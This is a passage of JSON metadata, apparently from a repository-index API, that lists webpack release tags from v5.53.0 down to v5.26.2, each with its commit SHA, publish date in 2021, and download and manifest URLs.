:"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms